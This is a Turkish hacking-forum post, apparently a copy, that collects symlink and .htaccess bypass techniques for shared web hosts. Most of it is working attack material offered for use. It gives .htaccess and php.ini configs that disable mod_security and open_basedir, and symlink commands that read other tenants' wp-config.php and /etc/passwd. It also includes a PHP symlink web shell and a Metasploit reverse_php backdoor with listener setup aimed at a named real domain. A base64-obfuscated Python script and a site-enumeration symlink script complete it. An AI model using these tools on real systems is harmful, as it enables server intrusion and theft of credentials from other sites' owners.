- 20 Ağu 2016
- 4,446
- 3
Konuyla ilgili BAZI Videolu Anlatımlar =>
[ame]https://www.youtube.com/watch?v=OU7gakFAEf0[/ame]
[ame]https://www.youtube.com/watch?v=dQ1y1GSiobA[/ame]
[ame]https://www.youtube.com/watch?v=5dkb8aHknYg[/ame]
[ame]https://www.youtube.com/watch?v=y2V1VK7w77c[/ame]
[ame]https://www.youtube.com/watch?v=CNMRkOY225I[/ame]
[ame]https://www.youtube.com/watch?v=nNVk5AxKsIE[/ame]
[ame]https://www.youtube.com/watch?v=drcru-MI2sI[/ame]
[ame]https://www.youtube.com/watch?v=-DIasGdWimM[/ame]
[ame]https://www.youtube.com/watch?v=0POx2Gsrrxs[/ame]
[ame]https://www.youtube.com/watch?v=1kggQCF79DE[/ame]
İçindekiler =>
1) - [ Bypass Directory ]-
2) Bypass Symlink with .htaccess
3) LiteSpeed Bypass [SymLink]
4) Litespeed Symlink 403 Forbidden Bypass
5) - [ Include symlink ]-
6) - [ Bypass Litespeed ] -
7) - [ ByPass OVH Hosting ]-
8) - [ Bypass Symlink 403 forbidden ] -
9) Bypass symlink via .htaccess 2016
10 ) ByPass Passwd in LiteSpeed Genel Mantık
11 ) Bypass Symlink (Priv8) Code
12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
13 ) Server Bypass OVH & BlueHost Symlink Code 2014
14 ) Symlink Bypass 404
15) Internal Server Error ByPass Hatası ve Çözümü Kodu
16) ****sploit Bypass Backconnect & Get Domainowners
17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
- [ Bypass Directory ]-
Bypass Symlink with .htaccess
LiteSpeed Bypass [SymLink]
Litespeed Symlink 403 Forbidden Bypass
- [ Include symlink ]-
- [ Bypass Litespeed ] -
- [ Bypass OVH ]-
- [ Bypass Symlink 403 forbidden ] -
Bypass symlink via .htaccess 2016
ByPass Passwd in LiteSpeed Genel Mantık
Simple Bypass Internal Server Error Symlink 2016
PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
Symlink Bypass 404
Server Bypass OVH & BlueHost Symlink Code 2014
Internal Server Error ByPass Hatası ve Çözümü Kodu
****sploit Bypass Backconnect & Get Domainowners
Server Bypass read and edit file with python script Work On (Linux,Win)
Symlink 404 Not Found Script
[ame]https://www.youtube.com/watch?v=OU7gakFAEf0[/ame]
[ame]https://www.youtube.com/watch?v=dQ1y1GSiobA[/ame]
[ame]https://www.youtube.com/watch?v=5dkb8aHknYg[/ame]
[ame]https://www.youtube.com/watch?v=y2V1VK7w77c[/ame]
[ame]https://www.youtube.com/watch?v=CNMRkOY225I[/ame]
[ame]https://www.youtube.com/watch?v=nNVk5AxKsIE[/ame]
[ame]https://www.youtube.com/watch?v=drcru-MI2sI[/ame]
[ame]https://www.youtube.com/watch?v=-DIasGdWimM[/ame]
[ame]https://www.youtube.com/watch?v=0POx2Gsrrxs[/ame]
[ame]https://www.youtube.com/watch?v=1kggQCF79DE[/ame]
İçindekiler =>
1) - [ Bypass Directory ]-
2) Bypass Symlink with .htaccess
3) LiteSpeed Bypass [SymLink]
4) Litespeed Symlink 403 Forbidden Bypass
5) - [ Include symlink ]-
6) - [ Bypass Litespeed ] -
7) - [ ByPass OVH Hosting ]-
8) - [ Bypass Symlink 403 forbidden ] -
9) Bypass symlink via .htaccess 2016
10 ) ByPass Passwd in LiteSpeed Genel Mantık
11 ) Bypass Symlink (Priv8) Code
12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
13 ) Server Bypass OVH & BlueHost Symlink Code 2014
14 ) Symlink Bypass 404
15) Internal Server Error ByPass Hatası ve Çözümü Kodu
16) ****sploit Bypass Backconnect & Get Domainowners
17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
- [ Bypass Directory ]-
Kod:
<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>
Bypass Symlink with .htaccess
Kod:
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
LiteSpeed Bypass [SymLink]
Kod:
python shell , CGI PERL Shell
and .htaccess
the htaccess code is
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
===============
what we should do ?
just open the cgi bypass shell
and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt
Litespeed Symlink 403 Forbidden Bypass
Kod:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
DirectoryIndex new
DirectoryIndex config.ini
- [ Include symlink ]-
Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
- [ Bypass Litespeed ] -
Kod:
wew.shtml
do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php
- [ Bypass OVH ]-
Kod:
.htaccess
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root
php.ini
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
ln -s / CoderSec
- [ Bypass Symlink 403 forbidden ] -
Kod:
.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Bypass symlink via .htaccess 2016
Kod:
OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
ByPass Passwd in LiteSpeed Genel Mantık
Kod:
A good way to bypass forbidden error when reading passwd file
The general approach:
ln -s / etc / passwd passwd.txt
Well, open the passwd file The forbidden error encountered
for bypass=>
To bypass coming from one of the following two commands are used:
Code: (Select All)
ln -s /etc/passwd README
ln -s /etc/passwd HEADER
The second command will run in a directory And when we go back to the directory where the file will be shown passwd us.
SPT to b0x
Bypass Symlink (Priv8)
How you can bypass Symlink in linux webserver ?
1/ Create a folder
2/ Upload inside
".htaccess"
CODE:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
3/ Bypass manually
ln -s /home/user/public_html/t0ph4cking.txt
Bypass Symlink 403 Forbidden with .htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Simple Bypass Internal Server Error Symlink 2016
Kod:
Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php
PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
Kod:
<?php
/*
PHP 5.2.11/5.3.0 symlink() open_basedir bypass
by KingSkrupellos - Cyberizm Digital Security Team
CHUJWAMWMUZG
*/
$fakedir="cx";
$fakedep=16;
$num=0; // offset of symlink.$num
Symlink Bypass 404
Kod:
<? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
fwrite($anu,"ReadmeName x.txt");
echo'<a href=sl/x.txt>CHECK</a>';
}
Server Bypass OVH & BlueHost Symlink Code 2014
Kod:
".htaccess":
#Bypass By Cyberizm.Org
<DIRECTORY /..../user/..../>
OPTIONS Indexes ExecCGI FollowSymLinks
AllowOverride All
</DIRECTORY>
AddType txt .php
AddHandler txt .php
"php.ini":
#Bypass By Cyberizm.Org
safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON
Internal Server Error ByPass Hatası ve Çözümü Kodu
Kod:
Bazen serverde cgi telnet shell derken internal server error diye gıcık bir hata alırsınız bunun çözüm yolu çok olmakla birlikte en garanti çözüm yolu cpanel girip MiME types bölümüne gelip ilk satıra
application/x-httpd-cgi
yı yazmak daha sonra ikinci satıra cgi shelinizin uzantısını yazmak mesela ali.veli şeklindeyse cgi sheliniz ikinci satıra veli yazıp okeylemek sonra broswere grip o cgi shelein olduğu adresi yenilemek tabi bu arada bu yenileme işlemini yapmadan önce ali.veli şeklindeki cgi shelimize chmod 755 vermeyi unutmayacaz
Öncelikle Serverimize CGI atmadan once Perl Kodlarımızı Açıyoruz Ve en başta olan
#!/usr/bin/perl -I/usr/local/bandmain yazıyoruz ve Serverimize upload ediyoruz.
Eğerki serverde tekrar hata oluyorsaniz Web Shell CGİ Denemenizi isterim
http://archive.is/UT8xf Buyrun burada
.htaccess code :
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
Options +ExecCGI
AddHandler cgi-script cgi pl wasRewriteEngine on
RewriteRule (.*)\.was$ $1.was
****sploit Bypass Backconnect & Get Domainowners
Kod:
////////////////////SET UP BACKDOOR////////////////////
use payload/php/reverse_php
set LHOST [You Wan Ip] set LPORT 22
set ENCODER php/base64
generate -t raw
////////////////SET UP LISTENING/////////////////
use exploit/multi/handler
set LHOST [You Lan IP] set LPORT 22
set payload php/reverse_php
exploit
/////////////////// RUN BACKDOOR////////////////
php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
//////////////////CAT /ETC/PASSWD//////////////
cat /etc/passwd > passwd.txt
///////////////////CAT USER-DOMAIN/////////////
cat /etc/virtual/domainowners > domain.txt
Server Bypass read and edit file with python script Work On (Linux,Win)
Kod:
#!/usr/bin/python
#-------------------------------------------------------------------------------
# Author: KingSkrupellos
# WebSite Cyberizm.Org
#-------------------------------------------------------------------------------
import base64;
exec(base64.b64decode('cHJpbnQgIiNvbWFucm9vdCINCnByaW50ICIjb20tcm9vdEBob3RtYWlsLmNvbSINCnByaW50ICIjR3JlZXRzICwgQWxsIE9tYW5pIEFuZCBNdXNsaW0gR3JheWhhdCINCnB1dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIGZpbGUgeW91IHdhbnQgdG8gYnJvd3NlIGl0IDogIikgIyBIZXJlIHRoZSBVc2VyIEVudGVyIGhpcyBmaWxlIHdhbnQgdG8gcHJvY2Nlc3MgaXQuDQp3b3JyID0gcmF3X2lucHV0KCJOb3RpY2UgLCAgdGhlIG1vZGVzIHdpbGwgZXhlY3V0ZSBpcyB3cml0ZT13IHJlYWQ9ciAsLCBmb3IgY29udGludWF0aW9uIHByZXNzIDxFbnRlcj4gOiIpICNoZXJlIHRoZSB1c2VyIGlmIGFjY2VwdCB0byB0aGUgZmlsZS4NCmlmIHdvcnIgPT0gJ3InIG9yICdyZWFkJyA6ICNoZXJlIHByb2Nlc3Mgb2YgcmVhZGluZw0KICAgIHJlYWQgPSBvcGVuKHB1dCwncicpDQogICAgZGF0YSA9IHJlYWQucmVhZCgpDQogICAgcHJpbnQgZGF0YQ0KaWYgd29yciA9PSAndycgb3IgJ3dyaXRlJzogI2hlcmUgcHJvY2VzcyBvZiB3cml0ZQ0KICAgIHdyaXRlID0gb3BlbihwdXQsJ3cnKQ0KICAgIHR4dCA9IHJhd19pbnB1dCgiRW50ZXIgdGhlIHRleHQgeW91IHdhbnQgdG8gYWRkIHRvIHRoZSBmaWxlIE5vdGljZShBTEwgZGF0YSBvbiB0aGlzIGZpbGUgeW91IHdpbGwgbG9zdCBpdCBcImlmIHlvdSBkb24ndCB3YW50IHBsZWFzZSBwcmVzcyBcJ0NUUkwrQ1wnIFwiKSA6IikNCiAgICB3cml0ZS53cml0ZSh0eHQpDQogICAgcHJpbnQgImNoZWNrIHlvdXIgZmlsZSAsIGlmIGl0IHdhcyBkb25lIC4iDQplbHNlOg0KICAgIHByaW50ICJFcnJvciINCiAgICBleGl0KCkNCg0KI0RvbmUgQnkgT21hbnJvb3Q='))
Symlink 404 Not Found Script
Kod:
#!/usr/bin/env python
#Symlink Script by KingSkrupellos
#Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
#Version 1.1
#Minor fixes
#
#contact me @ Cyberizm Digital Security Team
#Cyberizm
import os,sys,re
if not os.path.exists('kidsymx'):
os.makedirs('kidsymx')
os.chdir('kidsymx')
hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
x=open('.htaccess','w')
x.write(hta)
x.close()
print '[+] htaccess created'
h="<html><head><title>kidSym</title>*********table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
<h1>
kidSym</h1>
<p class=menf>
KingSkrupellos
greetz:Cyberizm Digital Security Team</p>
<table >"
os.system("ln -s / kid.txt")
if os.path.exists('kid.txt'):
print "[+] Symlink Created"
else:
print "[-] Unable to Create Symlink"
usrs=[]
sitesx=[]
z=open("/etc/passwd","r")
z=z.read()
z=re.findall('/home\w*?/\w+',z)
for usr in z:
usrs.append(usr)
sites=os.listdir("/var/named/")
for site in sites:
site=site.replace(".db","")
sitesx.append(site)
#php making
path=os.getcwd()
if "/public_html/" in path:
path="/public_html/"
else:
path="/html/"
counter=1
indx=open("kSym.php","w")
indx.write(h)
for userx in usrs:
for sitex in sitesx:
u=userx.split("/",2)[2][0:5]
s=sitex[0:5]
if u==s:
indx.write("
<tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
counter=counter+1
print "[+] Site index Complete"
print "[*] %s Sites found" %str(counter)
print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"
//ALINTIDIR//